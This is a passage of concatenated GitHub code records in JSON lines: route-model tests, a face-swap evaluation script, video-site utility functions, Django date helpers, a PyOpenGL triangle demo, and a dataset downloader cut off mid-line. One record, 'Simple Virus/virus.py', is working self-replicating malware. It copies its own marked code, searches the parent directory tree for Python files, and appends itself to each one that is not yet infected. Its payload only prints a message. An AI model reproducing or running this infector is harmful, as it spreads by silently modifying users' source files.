np.cos(angle)) < eps\n assert (bicyclist.max_propulsion(speed, Ca, angle) - min(W_max / speed, Ca\n * mass * g * np.cos(angle))) < eps\n\ndef test_Route():\n x = np.linspace(0.0, 100.0, num=100)\n z = np.sin(x)\n l = np.hstack((5.0 * np.ones_like(x[:50]), 10.0 * np.ones_like(x[50:])))\n s = np.array([45.0, 67.8, 92.0])\n route = model.Route(x, z, l, s)\n\n assert (route.current_speed_limit(30.0) - 5.0) < eps\n assert (route.current_speed_limit(60.0) - 10.0) < eps\n\n ns = route.next_stop(15.0)\n assert (ns - 45.0) < eps\n dts = route.distance_to_stop(15.0)\n assert (dts - 30.0) < eps\n\n ns = route.next_stop(50.0)\n assert (ns - 67.8) < eps\n dts = route.distance_to_stop(50.0)\n assert (dts - 17.8) < eps\n\n ns = route.next_stop(70.0)\n assert (ns - 92.0) < eps\n dts = route.distance_to_stop(70.0)\n assert (dts - 22.0) < eps\n\n ns = route.next_stop(95.0)\n assert ns is None\n dts = route.distance_to_stop(95.0)\n assert dts is None\n","repo_name":"moorepants/EfficientRoutes","sub_path":"efficientroutes/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"75114594346","text":"import torch\nfrom torch.utils.data import DataLoader, SequentialSampler\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\nimport numpy as np\nimport os\nfrom torchvision.utils import save_image\n\nfrom PIL import Image\nfrom face_shifter import face_shifter_batch\n\n\ndef fixed_image_standardization(image_tensor):\n processed_tensor = (image_tensor - 127.5) / 128.0\n return processed_tensor\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\ndef main():\n data_dir = '/mnt/Data8T/lyyang/LFW_align_crop_224'\n targ_img_path = '/home/lyyang/papercode/FRModel/testimg/Ethan_Hawke_0001.jpg'\n batch_size = 8\n workers = 0 if os.name == 'nt' else 8\n\n trans = transforms.Compose([\n # transforms.Resize(160),\n np.float32,\n transforms.ToTensor(),\n fixed_image_standardization\n ])\n\n target_image = trans(Image.open(targ_img_path))\n target_img = target_image.repeat(batch_size, 1, 1, 1)\n\n dataset = datasets.ImageFolder(data_dir, transform=trans)\n\n dataset.samples = [\n (p, (p, idx))\n for p, idx in dataset.samples\n ]\n\n test_loader = DataLoader(\n dataset,\n num_workers=workers,\n batch_size=batch_size,\n sampler=SequentialSampler(dataset)\n )\n\n with torch.no_grad():\n batch_idx = 0\n for batch in tqdm(test_loader):\n batch_idx += 1\n source_img, (paths, yb) = batch\n source_img = source_img.to(device)\n img_path_orig = f\"/home/lyyang/papercode/FRModel/testimg/lfw/{batch_idx}_org.jpg\"\n img_path_res = f\"/home/lyyang/papercode/FRModel/testimg/lfw/{batch_idx}_res.jpg\"\n save_image((source_img + 1.0) / 2.0, img_path_orig, nrow=4)\n face_shifter_tensor = face_shifter_batch(source_img, target_img)\n save_image((face_shifter_tensor + 1.0) / 2.0, img_path_res, nrow=4)\n\n\n\nif __name__ == '__main__':\n # 修改之前的target\n import time\n\n T1 = time.time()\n main()\n T2 = time.time()\n with open(\"/home/lyyang/papercode/FRModel/testimg/timelog.txt\", \"w\") as f:\n f.write('程序运行时间:%s秒' % (T2 - T1))\n","repo_name":"fkeufss/PRO-Face","sub_path":"FaceShifter/lfwtest.py","file_name":"lfwtest.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"32516290415","text":"##### VIRUS START #####\nimport sys\nimport threading\nimport os\n\n\ndef copyvirus():\n # Copy virus code\n virus_code = []\n in_virus = False\n in_payload = False\n\n with open(sys.argv[0], 'r') as f:\n for line in f.readlines():\n if line == \"##### VIRUS START #####\\n\":\n in_virus = True\n if in_virus:\n if in_payload:\n pass\n virus_code.append(line)\n if line == \"##### VIRUS PAYLOAD #####\\n\":\n in_payload = True\n\n if line == \"##### VIRUS END #####\\n\":\n break\n f.close()\n return virus_code\n\n\ndef findfiles():\n # Find python files\n python_files = []\n print(\"\\nFiles:\")\n for root, dirs, files in os.walk(\"..\"):\n for name in files:\n if name.endswith(\".py\"):\n print(os.path.join(root, name))\n python_files.append(os.path.join(root, name))\n # print(pathlib.Path(os.path.join(root, name)))\n return python_files\n\n\ndef infectfiles(python_files, virus_code):\n # Infect files\n for file in python_files:\n infected = False\n with open(file, 'r') as f:\n code = f.readlines()\n f.close()\n for line in code:\n if line == \"##### VIRUS START #####\\n\":\n infected = True\n break\n if not infected:\n new_code = []\n new_code.extend(code)\n new_code.append(\"\\n\\n\\n\")\n new_code.extend(virus_code)\n with open(file, 'w') as f:\n f.writelines(new_code)\n f.close()\n\n\n##### PAYLOAD START #####\n\ndef executepayload():\n print(\"You've been infected by my virus\")\n\n\n##### PAYLOAD END #####\n\n\ndef main():\n virus = copyvirus()\n files = findfiles()\n infectfiles(files, virus)\n executepayload()\n\n\nt1 = threading.Thread(target=main)\nt1.start()\n\n##### VIRUS END #####","repo_name":"aLonelySquidNamedBob/Random-Projects","sub_path":"Simple Virus/virus.py","file_name":"virus.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72057338347","text":"#!/usr/bin/env python3\nimport json\nimport os\nfrom log import *\nimport platform\nimport datetime\nimport shutil\nimport subprocess\nimport stat\n\n\n# 获取系统\ndef get_platform():\n return platform.system().lower()\n\n\n# 列表中的空格\ndef list_trim(list1):\n return [x.strip() for x in list1 if x.strip() != '']\n\n\n# 替换不要要的数据并且去除空\ndef replace_trim(str, it_var):\n new_str = it_var.replace(str, '')\n new_str = new_str.strip()\n return new_str\n\n\n# 带分割的包的数量\ndef get_chunk():\n return 50\n\n\n# 判断类型\ndef typeof(variate):\n type = None\n if isinstance(variate, int):\n type = \"int\"\n elif isinstance(variate, str):\n type = \"str\"\n elif isinstance(variate, float):\n type = \"float\"\n elif isinstance(variate, list):\n type = \"list\"\n elif isinstance(variate, tuple):\n type = \"tuple\"\n elif isinstance(variate, dict):\n type = \"dict\"\n elif isinstance(variate, set):\n type = \"set\"\n return type\n\n\n# 打印数据\ndef p(data, t=0):\n print(data)\n if t == 0:\n exit()\n\n\n# 生成 视频信息 -i info\ndef you_get_i_url_info(strs, type='iqiyi'):\n if strs.find('[ DEFAULT ] _________________________________') >= 0:\n strs = strs.split(\"[ DEFAULT ] _________________________________\")[1]\n get_platform_str = get_platform()\n if get_platform_str == \"windows\":\n if len(strs.split(\"\\r\\n\\r\\n\")) > 1:\n ts_list = strs.split(\"\\r\\n\\r\\n\")\n else:\n ts_list = strs.split(\"\\r\\n\")\n else:\n ts_list = strs.split(\"\\n\\n\")\n new_ts_list = {}\n ts_key_list = {\n 'format': '- format:',\n 'container': 'container:',\n 'video_profile': 'video-profile:',\n 'm3u8_url': 'm3u8_url:',\n 'download_with': '# download-with:',\n }\n if type == 'youku':\n ts_key_list['size'] = 'size:'\n for index in range(len(ts_list)):\n new_ts_index_list = {}\n it_var = ts_list[index]\n if get_platform_str == \"windows\":\n if len(it_var.split(\"\\r\\n\")) > 1:\n ts_it_var = it_var.split(\"\\r\\n\")\n else:\n ts_it_var = it_var.split(\"\\n\")\n else:\n ts_it_var = it_var.split(\"\\n\")\n for ts_it_var_index in range(len(ts_it_var)):\n ts_it_var_str = ts_it_var[ts_it_var_index]\n for ts_val, ts_key in ts_key_list.items():\n if ts_it_var_str.find(ts_key) >= 0:\n new_ts_index_list[ts_val] = replace_trim(ts_key, ts_it_var_str)\n if len(new_ts_index_list) > 0:\n new_ts_list[new_ts_index_list['format']] = new_ts_index_list\n return new_ts_list\n\n\n# 打印json\ndef pJson(data):\n p(json.dumps(data, ensure_ascii=False, indent=1))\n\n\n# 获取code\ndef getCode():\n code_path = os.getcwd() + '/code.txt'\n code_path = code_path.replace(\"\\\\\", '/')\n f = open(code_path, 'r')\n return f.read()\n\n\n# 添加log\ndef myLog(txt, logPath=None, logName='mylog'):\n if logPath is None:\n logPath = os.getcwd() + '/runtime/log/' + time.strftime(\"%Y/%m/%d\", time.localtime())\n # 文件夹 创建\n video_mkdir(logPath)\n log = Log(__name__, logPath=logPath, logName=logName).getlog()\n log.info(txt)\n\n\n# 创建文件夹\ndef video_mkdir(path):\n # 去除首位空格\n path = path.strip()\n # 去除尾部 \\ 符号\n path = path.rstrip(\"\\\\\")\n # 判断路径是否存在\n # 存在 True\n # 不存在 False\n isExists = os.path.exists(path)\n # 判断结果\n if not isExists:\n # 如果不存在则创建目录\n # 创建目录操作函数\n os.makedirs(path)\n return True\n else:\n # 如果目录存在则不创建,并提示目录已存在\n return False\n\n\n# 获取pid\ndef get_pid(type_id):\n type_list = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 1, 7: 1, 8: 1, 9: 1, 10: 1, 11: 1, 12: 1, 13: 2, 14: 2, 15: 2,\n 16: 2, 17: 5, 18: 5, 19: 4, 20: 4, 21: 4, 22: 4, 23: 23, 24: 2, 25: 3, 26: 3, 27: 3, 28: 3}\n return type_list[type_id]\n\n\n# 是否存在文件或者文件夹\ndef is_mkdir(path, type=1):\n # 去除首位空格\n path = path.strip()\n # 去除尾部 \\ 符号\n path = path.rstrip(\"\\\\\")\n # 判断路径是否存在\n if type == 1:\n isExists = os.path.exists(path)\n else:\n isExists = os.path.isdir(path)\n # 判断结果 不存在 false\n if not isExists:\n return False\n else:\n return True\n\n\n# 是否存在文件\ndef is_file(path):\n # 去除首位空格\n path = path.strip()\n # 去除尾部 \\ 符号\n path = path.rstrip(\"\\\\\")\n # 判断路径是否存在\n isExists = os.path.isfile(path)\n # 判断结果 不存在 false\n if not isExists:\n return False\n else:\n return True\n\n\n# 取出单个列表\ndef array_column_one(result, key):\n return list(map(lambda x: x[key], result))\n\n\n# 去出列表\ndef array_column(result, column=None, index_key=None):\n new_result = {}\n for result_index in range(len(result)):\n result_str = result[result_index]\n if column is None and index_key is not None:\n new_result[result_str[index_key]] = result_str\n elif column is not None and index_key is not None:\n new_result[result_str[index_key]] = result_str[column]\n else:\n new_result[result_index] = result_str[column]\n return new_result\n\n\n# 将数组元素分割比例\ndef array_chunk(arr, size):\n s = []\n for i in range(0, int(len(arr)) + 1, size):\n c = arr[i:i + size]\n if c:\n s.append(c)\n return s\n\n\n# 获取文件夹文件\ndef file_name(file_dir, new_vod_url_str=''):\n L = []\n for root, dirs, files in os.walk(file_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.ts' or os.path.splitext(file)[1] == '.m3u8':\n if new_vod_url_str != '':\n L.append(os.path.join(new_vod_url_str, file))\n else:\n L.append(os.path.join(root, file))\n return L\n\n\n# 获取文件夹文件\ndef file_name_list(file_dir, new_vod_url_str='', type=None):\n L = []\n for root, dirs, files in os.walk(file_dir):\n for file in files:\n if type is not None:\n if os.path.splitext(file)[1] != \"\" and str(os.path.splitext(file)[0])[0] != \".\":\n if new_vod_url_str != '':\n L.append(os.path.join(new_vod_url_str, file))\n else:\n L.append(os.path.join(root, file))\n else:\n if new_vod_url_str != '':\n L.append(os.path.join(new_vod_url_str, file))\n else:\n L.append(os.path.join(root, file))\n return L\n\n\n# 获取视频数据\ndef get_vod_video(result):\n new_video_install = {}\n new_video_install['type_pid'] = result['type_id_1']\n new_video_install['type_id'] = result['type_id']\n new_video_install['vod_name'] = result['vod_name']\n new_video_install['vod_sub'] = result['vod_sub']\n new_video_install['vod_en'] = result['vod_en']\n new_video_install['vod_tag'] = result['vod_en']\n tag = result[\"vod_tag\"]\n if len(tag) < 2:\n tag = result[\"vod_class\"]\n new_video_install[\"vod_tag\"] = tag\n new_video_install[\"vod_pic\"] = result[\"vod_pic\"]\n new_video_install[\"vod_pic_thumb\"] = result[\"vod_pic_thumb\"]\n new_video_install[\"vod_pic_slide\"] = result[\"vod_pic_slide\"]\n new_video_install[\"vod_actor\"] = result[\"vod_actor\"]\n new_video_install[\"vod_director\"] = result[\"vod_director\"]\n new_video_install[\"vod_writer\"] = result[\"vod_writer\"]\n new_video_install[\"vod_behind\"] = result[\"vod_behind\"]\n if len(result[\"vod_content\"]) > len(result[\"vod_blurb\"]):\n new_video_install[\"vod_blurb\"] = result[\"vod_content\"]\n else:\n new_video_install[\"vod_blurb\"] = result[\"vod_blurb\"]\n new_video_install[\"vod_remarks\"] = result[\"vod_remarks\"]\n new_video_install[\"vod_pubdate\"] = result[\"vod_pubdate\"]\n new_video_install[\"vod_total\"] = result[\"vod_total\"]\n new_video_install[\"vod_serial\"] = result[\"vod_serial\"]\n new_video_install[\"vod_tv\"] = result[\"vod_tv\"]\n new_video_install[\"vod_weekday\"] = result[\"vod_weekday\"]\n new_video_install[\"vod_area\"] = result[\"vod_area\"]\n new_video_install[\"vod_lang\"] = result[\"vod_lang\"]\n new_video_install[\"vod_year\"] = result[\"vod_year\"]\n new_video_install[\"vod_version\"] = result[\"vod_version\"]\n new_video_install[\"vod_state\"] = result[\"vod_state\"]\n new_video_install[\"vod_duration\"] = result[\"vod_duration\"]\n new_video_install[\"vod_isend\"] = result[\"vod_isend\"]\n new_video_install[\"vod_douban_id\"] = result[\"vod_douban_id\"]\n new_video_install[\"vod_douban_score\"] = result[\"vod_douban_score\"]\n new_video_install[\"vod_time\"] = int(time.time())\n new_video_install[\"vod_time_add\"] = int(time.time())\n new_video_install[\"vod_id\"] = result[\"vod_id\"]\n return new_video_install\n\n\n# 插入\ndef os_write(file_txt, txt):\n file_ob = open(file_txt, \"w\")\n file_ob.write(txt)\n file_ob.close()\n\n\n# 获取视频集数据\ndef get_vod_collection(install_video_id, result, like_collection, vod_url, like_path):\n install_collection_data = {}\n install_collection_data['video_id'] = install_video_id\n install_collection_data[\"code\"] = getCode()\n install_collection_data['title'] = '第' + str(like_collection) + '集'\n install_collection_data['collection'] = int(like_collection)\n install_collection_data['vod_url'] = vod_url\n install_collection_data['duration'] = get_duration(like_path)\n install_collection_data['resolution'] = ''\n install_collection_data['bitrate'] = ''\n install_collection_data['time_up'] = int(time.time())\n install_collection_data['size'] = str(get_file_size(like_path))\n install_collection_data['name'] = result['vod_name']\n install_collection_data['director'] = result['vod_director']\n return install_collection_data\n\n\n# 文件获取时长\ndef get_duration(path):\n duration1 = float(0)\n try:\n get_time = float(0)\n new_m3u8_file = f\"{path}/index.m3u8\"\n print(new_m3u8_file)\n with open(new_m3u8_file, 'r', encoding='UTF-8') as file_obj:\n line_str = file_obj.read()\n for line_index in line_str.split('\\n'):\n line_index_str = replace_trim(\"\\n\", line_index)\n if \"EXTINF\" in line_index_str:\n str1 = line_index_str.split(\":\")[1][:-1]\n if str1.endswith(','):\n time = float(str1[:-1])\n else:\n time = float(str1)\n get_time = get_time + time\n duration1 = str(datetime.timedelta(seconds=get_time))\n if '.' in duration1:\n duration1 = duration1.split('.')[0]\n except Exception as e:\n pass\n return duration1\n\n\n# 获取文件大小\ndef get_file_size(filePath, size=0):\n for root, dirs, files in os.walk(filePath):\n for f in files:\n size += os.path.getsize(os.path.join(root, f))\n return size\n\n\ndef get_mg_header(referer_url=None, cookie=None):\n mg_header = {\n \"Referer\": referer_url,\n \"User-Agent\": \"Mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/71.0.3578.98 safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Charset\": \"UTF-8,*;q=0.5\",\n \"Cookie\": cookie,\n \"Accept-Encoding\": \"gzip,deflate,sdch\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n }\n if cookie is None:\n del mg_header['Cookie']\n if referer_url is None:\n del mg_header['Referer']\n return mg_header\n\n\n# 删除文件夹\ndef misc_init(filePath):\n if is_mkdir(filePath):\n if os.path.exists(filePath):\n for fileList in os.walk(filePath):\n for name in fileList[2]:\n os.chmod(os.path.join(fileList[0], name), stat.S_IWRITE)\n os.remove(os.path.join(fileList[0], name))\n shutil.rmtree(filePath, True)\n return True\n else:\n return False\n\n\n# 是否测试字符串和数字\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n return False\n\n\n# log\ndef common_print_log(str, logName='myLog', logPath=None):\n print(str)\n myLog(str, logPath=logPath, logName=logName)\n\n\n# 将秒数转换为时间\ndef getTime(seconds):\n timeArray = time.localtime(seconds)\n otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n return otherStyleTime\n\n\n# 将时间转换为秒数\ndef composeTime(time1):\n time2 = datetime.datetime.strptime(time1, \"%Y-%m-%d %H:%M:%S\")\n time3 = time.mktime(time2.timetuple())\n time4 = int(time3)\n return time4\n","repo_name":"litcas/video","sub_path":"upimage/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":12990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74562664426","text":"import calendar\nimport datetime\nimport decimal\nimport re\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom typing import Iterator, Optional\n\nfrom base import constants\n\n\nclass KgDate:\n \"\"\"\n A date class that is more ergonomic to use than ``datetime.date``.\n \"\"\"\n\n def __init__(self, *, year: int, month: int, day: Optional[int] = None) -> None:\n self.year = year\n self.month = month\n self.day = day\n\n def replace(\n self,\n *,\n year: Optional[int] = None,\n month: Optional[int] = None,\n day: Optional[int] = None,\n ) -> \"KgDate\":\n if year is None:\n year = self.year\n\n if month is None:\n month = self.month\n\n if day is None:\n day = self.day\n\n return KgDate(year=year, month=month, day=day)\n\n def plus(self, *, years: int = 0, months: int = 0, days: int = 0) -> \"KgDate\":\n if years != 0:\n if months != 0 or days != 0:\n raise ValueError\n\n return KgDate(year=self.year + years, month=self.month, day=self.day)\n\n if months != 0:\n if days != 0:\n raise ValueError\n\n year_increment, month = divmod(self.month + months, 12)\n return KgDate(year=self.year + year_increment, month=month, day=self.day)\n\n if days != 0:\n if days >= 28:\n raise ValueError\n\n if self.day is None:\n raise ValueError\n\n days_in_month = get_days_in_month(self.year, self.month)\n if self.day + days > days_in_month:\n new_day = (self.day + days) - days_in_month\n if self.month == 12:\n return KgDate(year=self.year + 1, month=1, day=new_day)\n else:\n return KgDate(year=self.year, month=self.month + 1, day=new_day)\n else:\n return KgDate(year=self.year, month=self.month, day=self.day + days)\n\n return self\n\n def minus(self, *, years: int = 0, months: int = 0, days: int = 0) -> \"KgDate\":\n if years != 0:\n if months != 0 or days != 0:\n raise ValueError\n\n return KgDate(year=self.year - years, month=self.month, day=self.day)\n\n if months != 0:\n if days != 0:\n raise ValueError\n\n # We have to subtract 1 from `months` and then add it back again so that\n # the modular arithmetic works.\n year_increment, month = divmod(self.month - months - 1, 12)\n return KgDate(\n year=self.year + year_increment, month=month + 1, day=self.day\n )\n\n if days != 0:\n if days >= 28:\n raise ValueError\n\n if self.day is None:\n raise ValueError\n\n if self.day - days < 1:\n days_in_previous_month = (\n get_days_in_month(self.year - 1, 1)\n if self.month == 1\n else get_days_in_month(self.year, self.month - 1)\n )\n new_day = days_in_previous_month + (self.day - days)\n if self.month == 1:\n return KgDate(year=self.year - 1, month=12, day=new_day)\n else:\n return KgDate(year=self.year, month=self.month - 1, day=new_day)\n else:\n return KgDate(year=self.year, month=self.month, day=self.day - days)\n\n return self\n\n def isoformat(self) -> str:\n if self.day is not None:\n return f\"{self.year}-{self.month:0>2}-{self.day:0>2}\"\n else:\n return f\"{self.year}-{self.month:0>2}\"\n\n def as_sql_pattern(self) -> str:\n if self.day is not None:\n return self.isoformat()\n else:\n return self.isoformat() + \"%\"\n\n def __eq__(self, other) -> bool:\n if isinstance(other, datetime.date):\n return (\n self.year == other.year\n and self.month == other.month\n and (self.day is None or self.day == other.day)\n )\n elif isinstance(other, KgDate):\n return (\n self.year == other.year\n and self.month == other.month\n and self.day == other.day\n )\n else:\n return NotImplemented\n\n def __repr__(self) -> str:\n if self.day is not None:\n return f\"KgDate(year={self.year}, month={self.month}, day={self.day})\"\n else:\n return f\"KgDate(year={self.year}, month={self.month})\"\n\n def __str__(self) -> str:\n return self.isoformat()\n\n\ndef time_to_minutes(t: datetime.time, *, normalize_pm: bool = False) -> int:\n \"\"\"\n Returns the number of minutes since midnight for the ``datetime.time`` object.\n\n :param normalize_pm: If true, then morning times are treated as happening after\n afternoon and evening times instead of before.\n \"\"\"\n return t.hour * 60 + t.minute + (24 * 60 if normalize_pm and t.hour < 12 else 0)\n\n\ndef within_range(\n month: datetime.date, start: datetime.date, end: datetime.date\n) -> bool:\n \"\"\"\n Returns true if any day of the range ``start`` to ``end`` is in the given month.\n\n The ``day`` field of ``month`` is ignored.\n \"\"\"\n month_start = datetime.date(month.year, month.month, 1)\n ndays = get_days_in_month(month.year, month.month)\n month_end = datetime.date(month.year, month.month, ndays)\n return 0 < count_days_of_overlap(month_start, month_end, start, end)\n\n\ndef get_days_in_month(year: int, month: int) -> int:\n \"\"\"\n Returns the number of days in the month.\n \"\"\"\n return calendar.monthrange(year, month)[1]\n\n\ndef count_days_of_overlap(\n start1: datetime.date,\n end1: Optional[datetime.date],\n start2: datetime.date,\n end2: Optional[datetime.date],\n):\n \"\"\"\n Returns the number of days that fall between both ranges.\n\n One range or the other may be open-ended (with an `end` of None), but not both.\n\n The endpoints are included in the count of days.\n \"\"\"\n assert end1 is None or start1 <= end1\n assert end2 is None or start2 <= end2\n assert not (end1 is None and end2 is None)\n\n start = max(start1, start2)\n end = min(end1, end2) if end1 and end2 else end1 or end2\n assert isinstance(end, datetime.date)\n return (end - start).days + 1 if start <= end else 0\n\n\ndef get_today_adjusted() -> datetime.date:\n \"\"\"\n Returns the current date, adjusted so that early morning times count as the previous\n day.\n\n In most cases this should be used in preference to ``datetime.date.today()``.\n \"\"\"\n now = datetime.datetime.now()\n if now.hour < 5:\n return now.date() - datetime.timedelta(days=1)\n else:\n return now.date()\n\n\ndate_pattern = re.compile(r\"^([0-9]{4})-([0-9]{2})(-([0-9]{2}))?$\")\ntime_pattern = re.compile(r\"^([0-9]{1,2}):([0-9]{2})(:([0-9]{2}))?$\")\n\n\ndef parse_date(s: str) -> datetime.date:\n \"\"\"\n Parses a date in ``YYYY-MM-DD`` format into a ``datetime.date`` object.\n\n The day is optional and defaults to 1 if not specified.\n\n Raises ``ValueError`` if the date is not correctly formatted.\n \"\"\"\n # Based on https://github.com/django/django/blob/master/django/utils/dateparse.py\n m = date_pattern.match(s)\n if m:\n year = int(m.group(1))\n month = int(m.group(2))\n day = int(m.group(4)) if m.group(4) else 1\n return datetime.date(year=year, month=month, day=day)\n else:\n raise ValueError(s)\n\n\ndef parse_time(s: str) -> datetime.time:\n \"\"\"\n Parses a time in ``HH:MM:SS`` into a ``datetime.time`` object.\n\n The second is optional and defaults to 0 if not specified. The leading digit of the\n hours may be omitted if it is '0'.\n\n Raises ``ValueError`` if the time is not correctly formatted.\n \"\"\"\n # Based on https://github.com/django/django/blob/master/django/utils/dateparse.py\n m = time_pattern.match(s)\n if m:\n hour = int(m.group(1))\n minute = int(m.group(2))\n second = int(m.group(4)) if m.group(4) else 0\n return datetime.time(hour=hour, minute=minute, second=second)\n else:\n raise ValueError(s)\n\n\ndef format_time(t: datetime.time) -> str:\n \"\"\"\n Returns the conventional human representation of a ``datetime.time`` object.\n \"\"\"\n # The hex code A0 is for the non-breaking space.\n return t.strftime(\"%I:%M\\xa0%p\").lstrip(\"0\")\n\n\ndef remove_prefix(string: str, prefix: str) -> str:\n \"\"\"\n If ``string`` begins with ``prefix``, returns ``string`` with ``prefix`` removed;\n otherwise returns ``string`` unchanged.\n \"\"\"\n return string[len(prefix) :] if string.startswith(prefix) else string\n\n\ndef remove_suffix(string: str, suffix: str) -> str:\n \"\"\"\n If ``string`` ends with ``suffix``, returns ``string`` with ``suffix`` removed;\n otherwise returns ``string`` unchanged.\n \"\"\"\n return string[: -len(suffix)] if string.endswith(suffix) else string\n\n\ndef get_short_file_path(path: str) -> str:\n \"\"\"\n Returns the short version of a file path, or the file path unchanged if it is not\n in ``constants.FILES``.\n \"\"\"\n return remove_prefix(path, constants.FILES + \"/\")\n\n\ndef snake_case(s: str) -> str:\n \"\"\"\n Converts an identifier from camel case to snake case.\n \"\"\"\n\n def snake_case_replacer(match):\n text = match.group(0)\n return text[0] + \"_\" + text[1]\n\n name = re.sub(r\"[a-z][A-Z]\", snake_case_replacer, s)\n return name.lower()\n\n\ndef date_range(start: datetime.date, end: datetime.date) -> Iterator[datetime.date]:\n \"\"\"\n Yields successive dates in the inclusive range from ``start`` to ``end``.\n \"\"\"\n it = start\n while it <= end:\n yield it\n it += datetime.timedelta(days=1)\n\n\nMONTHS_TO_INDICES = {\n \"january\": 1,\n \"february\": 2,\n \"march\": 3,\n \"april\": 4,\n \"may\": 5,\n \"june\": 6,\n \"july\": 7,\n \"august\": 8,\n \"september\": 9,\n \"october\": 10,\n \"november\": 11,\n \"december\": 12,\n}\n\n\nclass CustomJSONEncoder(DjangoJSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n\n return super().default(o)\n","repo_name":"iafisher/khaganate-snapshot","sub_path":"base/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29968970866","text":"import pygame as pg\nfrom OpenGL.GL import *\nimport numpy as np\nimport ctypes\nfrom OpenGL.GL.shaders import compileProgram, compileShader\n\nclass App:\n\n\n def __init__(self):\n\n # Inicializa o Pygame\n pg.init()\n pg.display.set_mode((640, 480), pg.OPENGL | pg.DOUBLEBUF)\n self.clock = pg.time.Clock()\n # Inicializa o OpenGL\n glClearColor(1, 0.2, 0.2, 1.0)\n\n # Cria o shader\n self.shader = self.createShader('shaders/vertex.txt', 'shaders/fragment.txt')\n glUseProgram(self.shader)\n\n # Cria triangulo\n self.triangulo = Triangulo()\n\n self.mainLoop()\n\n def createShader(self, vertexFilepath, fragmentFilepath):\n\n with open(vertexFilepath, 'r') as f:\n vertex_src = f.read()\n\n with open(fragmentFilepath, 'r') as f:\n fragment_src = f.read()\n\n shader = compileProgram(\n compileShader(vertex_src, GL_VERTEX_SHADER),\n compileShader(fragment_src, GL_FRAGMENT_SHADER)\n )\n\n return shader\n\n # Loop principal do jogo\n def mainLoop(self):\n\n running = True\n while running:\n # verifica eventos\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n\n # limpa a tela\n glClear(GL_COLOR_BUFFER_BIT)\n\n # desenha o triangulo\n glUseProgram(self.shader)\n glBindVertexArray(self.triangulo.vao)\n glDrawArrays(GL_TRIANGLES, 0, self.triangulo.vertex_count)\n pg.display.flip()\n\n # limita a 60 fps\n self.clock.tick(60)\n\n self.quit()\n\n # Finaliza o jogo\n def quit(self):\n self.triangle.destroy()\n glDeleteProgram(self.shader)\n pg.quit()\n\nclass Triangulo:\n\n def __init__(self):\n \n # x, y, z, r, g, b\n self.vertices = (\n -0.5, -0.5, 0.0, 1.0, 0.0, 0.0,\n 0.5, -0.5, 0.0, 0.0, 1.0, 0.0,\n 0.0, 0.5, 0.0, 0.0, 0.0, 1.0\n )\n\n self.vertices = np.array(self.vertices, dtype=np.float32)\n\n self.vertex_count = 3\n\n self.vao = glGenVertexArrays(1)\n glBindVertexArray(self.vao)\n self.vbo = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, self.vertices.nbytes, self.vertices, GL_STATIC_DRAW)\n # position\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 24, ctypes.c_void_p(0))\n # color\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 24, ctypes.c_void_p(12))\n\n def destroy(self):\n glDeleteVertexArrays(1, (self.vao))\n glDeleteBuffers(1, (self.vbo))\n\n\nif __name__ == '__main__':\n App()\n","repo_name":"DeivisFelipe/OpenGL-Python","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17260507030","text":"import glob\nimport json\nimport math\nimport os\n\nimport requests\n\nURL = \"https://klacansky.com/open-scivis-datasets/datasets.json\"\nSIZE_LIMIT_MB = 1024\n\n\ndef get_datasets_urls(size_limit_mb):\n req = requests.get(URL)\n datasets_json = json.loads(req.text)\n\n dtype_size = {\n \"uint8\": 1,\n \"int16\": 2,\n \"uint16\": 2,\n \"float32\": 4,\n \"float64\": 8,\n }\n\n return [\n dataset[\"url\"]\n for dataset in datasets_json.values()\n if math.prod(dataset[\"size\"]) * dtype_size[dataset[\"type\"]]\n < (size_limit_mb * 1e6)\n ]\n\n\ndef download_file(url, dest):\n # https://stackoverflow.com/questions/16694907/download-large-file-in-python-with-requests\n with requests.get(url, stream=True) as req:\n with open(dest, \"wb\") as dst:\n for chunk in req.iter_content(chunk_size=8192):\n dst.write(chunk)\n print(f\"Downloaded {dest} from {url}\")\n\n\ndef download_dataset(dataset_url, dest_dir=\"\"):\n dataset_name = dataset_url.split(\"/\")[-1]\n if dest_dir + dataset_name in glob.glob(dest_dir + \"*.raw\"):\n print(f\"{dataset_name} already downloaded, skipping...\")\n return\n download_file(dataset_url, dest_dir + dataset_name)\n\n\ndef main(max_size=SIZE_LIMIT_MB):\n dest_dir = \"raws\"\n try:\n os.mkdir(dest_dir)\n except FileExistsError:\n pass\n\n ds_urls = get_datasets_urls(max_size)\n for url in 